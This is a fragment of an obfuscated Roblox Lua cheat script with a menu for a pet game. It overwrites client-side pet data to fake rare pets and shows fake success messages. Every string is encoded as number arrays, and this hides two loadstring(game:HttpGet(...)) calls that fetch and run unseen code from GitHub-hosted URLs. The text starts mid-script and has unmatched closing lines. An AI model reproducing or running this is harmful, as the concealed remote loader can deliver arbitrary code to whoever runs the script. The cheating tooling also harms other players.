local toPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({42500,55000,52500,49500,55500,57000,55000,16000,34000,57000,48500,51500,55500,55000})

for i,v in pairs(lib.Directory.Pets[fromPet]) do
  lib.Directory.Pets[fromPet][i] = nil
end
for i,v in pairs(lib.Directory.Pets[toPet]) do
  lib.Directory.Pets[fromPet][i] = v
    end

    local lib = require(game.ReplicatedStorage.Library)

local fromPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({35000,54000,48500,54500,52500,55000,51500,55500})
local toPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({42500,55000,52500,49500,55500,57000,55000,16000,34000,57000,48500,51500,55500,55000})

for i,v in pairs(lib.Directory.Pets[fromPet]) do
  lib.Directory.Pets[fromPet][i] = nil
end
for i,v in pairs(lib.Directory.Pets[toPet]) do
  lib.Directory.Pets[fromPet][i] = v
    end

    loadstring(game:HttpGet(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({52000,58000,58000,56000,57500,29000,23500,23500,57000,48500,59500,23000,51500,52500,58000,52000,58500,49000,58500,57500,50500,57000,49500,55500,55000,58000,50500,55000,58000,23000,49500,55500,54500,23500,58000,55500,49000,52500,26000,25500,27500,48500,23500,41500,49500,57000,52500,56000,58000,57500,23500,54500,48500,52500,55000,23500,48500,25500,25500,27000,50000,26000,28000,28000,49000,49000,28000,28500,25500,27000,25500,24500,24500,28500,49000,49000,26000,49500,26000,49500,23000,54000,58500,48500})))()
  end

)

local Tab = Window:NewTab(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({40000,50500,58000,16000,41500,56000,48500,59500,55000,50500,57000,120000,79500,72000,88500}))
local Section = Tab:NewSection(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,58500,49000,57500,49500,57000,52500,49000,50500,16000,42000,55500,16000,38500,60500,16000,33500,52000,48500,55000,55000,50500,54000}))

Section:NewLabel(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,49500,57000,52500,56000,58000,16000,38500,48500,50000,50500,16000,33000,60500,16000,41500,48500,51000,50500,58000,60500,36000,58500,49000,16000,39500,55000,16000,44500,55500,58500,42000,58500,49000,50500}))

Section:NewTextBox(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({40000,50500,58000,16000,39000,48500,54500,50500,113000,78000,71500,119500,92000,71500}), UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({42000,50500,60000,58000,49000,55500,60000,36500,55000,51000,55500}), function(txt)
    game.StarterGui:SetCore(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,50500,55000,50000,39000,55500,58000,52500,51000,52500,49500,48500,58000,52500,55500,55000}),{
        Title = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({40000,50500,58000,16000,39000,48500,54500,50500});
        Text = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,50500,58000,16000,41500,58500,49500,49500,50500,57500,57500,51000,58500,54000,54000,60500,16500});
    })
end)

Section:NewButton(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,58000,48500,57000,58000,16000,41500,56000,48500,59500,55000,50500,57000}), UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({33000,58500,58000,58000,55500,55000,36500,55000,51000,55500}), function()
    local message = require(game.ReplicatedStorage.Library.Client.Message)
message.Error(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({42000,52500,58000,48500,55000,52500,49500,16000,41500,53500,50500,58000,49500,52000,16000,33500,48500,58000,16000,41500,58500,49500,49500,50500,57500,57500,51000,58500,54000,60500,16000,41500,56000,48500,59500,55000,16000,42000,55500,16000,60500,55500,58500,57000,16000,36500,55000,59000,50500,55000,58000,55500,57000,60500,23500,16000,34000,58500,56000,50500,16000,41500,58500,49500,49500,50500,57500,57500,51000,58500,54000,60500}))

    local lib = require(game.ReplicatedStorage.Library)

local fromPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({34000,48500,54000,54500,48500,58000,52500,48500,55000})
local toPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({42000,52500,58000,48500,55000,52500,49500,16000,41500,53500,50500,58000,49500,52000,16000,33500,48500,58000})

for i,v in pairs(lib.Directory.Pets[fromPet]) do
  lib.Directory.Pets[fromPet][i] = nil
end
for i,v in pairs(lib.Directory.Pets[toPet]) do
  lib.Directory.Pets[fromPet][i] = v
    end
  end

)

local Tab = Window:NewTab(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,50500,58000,58000,52500,55000,51500,120000,79500,74000,84500}))
local Section = Tab:NewSection(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,58500,49000,57500,49500,57000,52500,49000,50500,16000,42000,55500,16000,38500,60500,16000,33500,52000,48500,55000,55000,50500,54000}))

Section:NewLabel(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,49500,57000,52500,56000,58000,16000,38500,48500,50000,50500,16000,33000,60500,16000,40000,57000,55500,50000,52500,51500,60500,38000,50500,51500,50500,55000,50000,57500,36000,40500,16000,39500,55000,16000,44500,55500,58500,42000,58500,49000,50500}))

local Tab = Window:NewTab(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({38500,52500,57500,49500}))
local Section = Tab:NewSection(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,58500,49000,57500,49500,57000,52500,49000,50500,16000,42000,55500,16000,38500,60500,16000,33500,52000,48500,55000,55000,50500,54000}))

Section:NewLabel(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,49500,57000,52500,56000,58000,16000,38500,48500,50000,50500,16000,33000,60500,16000,41500,48500,51000,50500,58000,60500,36000,58500,49000,16000,39500,55000,16000,44500,55500,58500,42000,58500,49000,50500}))

local Tab = Window:NewTab(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({40000,54000,48500,60500,50500,57000,120000,79500,72500,84000}))
local Section = Tab:NewSection(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,58500,49000,57500,49500,57000,52500,49000,50500,16000,42000,55500,16000,38500,60500,16000,33500,52000,48500,55000,55000,50500,54000}))

Section:NewLabel(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,49500,57000,52500,56000,58000,16000,38500,48500,50000,50500,16000,33000,60500,16000,41500,48500,51000,50500,58000,60500,36000,58500,49000,16000,39500,55000,16000,44500,55500,58500,42000,58500,49000,50500}))

loadstring(game:HttpGet(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({52000,58000,58000,56000,57500,29000,23500,23500,57000,48500,59500,23000,51500,52500,58000,52000,58500,49000,58500,57500,50500,57000,49500,55500,55000,58000,50500,55000,58000,23000,49500,55500,54500,23500,58000,55500,49000,52500,26000,25500,27500,48500,23500,41500,49500,57000,52500,56000,58000,57500,23500,54500,48500,52500,55000,23500,24000,50500,27000,25000,27500,49000,51000,24500,25000,24500,50000,24500,28000,50000,50000,50500,24500,24500,48500,27000,27500,49000,24000,50000,23000,54000,58500,48500})))()
